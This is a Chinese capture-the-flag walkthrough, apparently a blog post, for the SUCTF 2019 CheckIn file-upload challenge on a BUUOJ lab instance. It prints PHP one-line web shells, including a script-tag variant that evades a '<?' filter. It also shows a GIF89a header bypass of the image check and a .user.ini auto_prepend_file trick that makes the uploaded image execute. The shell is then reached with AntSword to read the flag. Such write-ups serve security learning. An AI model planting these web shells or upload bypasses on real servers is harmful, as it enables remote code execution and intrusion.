[SUCTF 2019]CheckIn通关详解

1.上传一句户木马文件a.php

<?php eval($_POST['zyy']);?><?php eval($_POST['zyy']);?>

爆破其他可支持的 php 文件后缀无果。

2. 上传正常的jpg文件,提示内容不能有<?。本来打算上传图片马,但是有过滤

3.可以改成下面的图片马:

<script language='php'>@eval($_POST['cmd']);</script>

修改后缀为.jpg上传

4.添加文件头后上传

GIF89a<script language='php'>@eval($_POST['zyy']);</script>

上传成功 放入蚁剑 测试连接数据为空 因为没有以php格式运行

5..尝试上传 .htaccess 文件,发现存在检测是否为图片的机制。

通过加入 GIF 文件幻数后成功绕过检测图片的机制,但是这样的话 ".htaccess" 被破坏,无法利用。

6.尝试上传 ".user.ini" 文件

利用 .user.ini 的前提是服务器开启了 CGI 或者 FastCGI,并且上传文件的存储路径下有 index.php 等可执行文件

.user.ini 中有两个配置:auto_prepend_file 和 auto_append_file。这两个配置的意思就是:我们指定一个文件(如 1.jpg),那么该文件就会被包含在要执行的 PHP 文件中(如 index.php),相当于在 index.php 中插入一句:require(./1.jpg);。这两个设置的区别只是在于 auto_prepend_file 是在文件前插入,auto_append_file 在文件最后插入。

上传b.txt文件 内容为

GIF89a                  
auto_prepend_file=a.jpg

bp抓包修改文件名为.user.ini

放行 上传成功

7.蚁剑连接

这里需要注意一下url格式

网址为http://72677aa1-8445-4c70-bc3f-fe7677825c71.node5.buuoj.cn:81/index.php

页面提示信息为Your dir uploads/17ac2685d5d5a6c401e7f5b28a603095

蚁剑中url地址应为

http://72677aa1-8445-4c70-bc3f-fe7677825c71.node5.buuoj.cn:81/ uploads/17ac2685d5d5a6c401e7f5b28a603095/index.php

连接成功 添加数据 双击打开条目 在根目录下找到了flag

即flag{4c6bf812-9da4-45ba-8ac5-0abfb1a18cbd}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值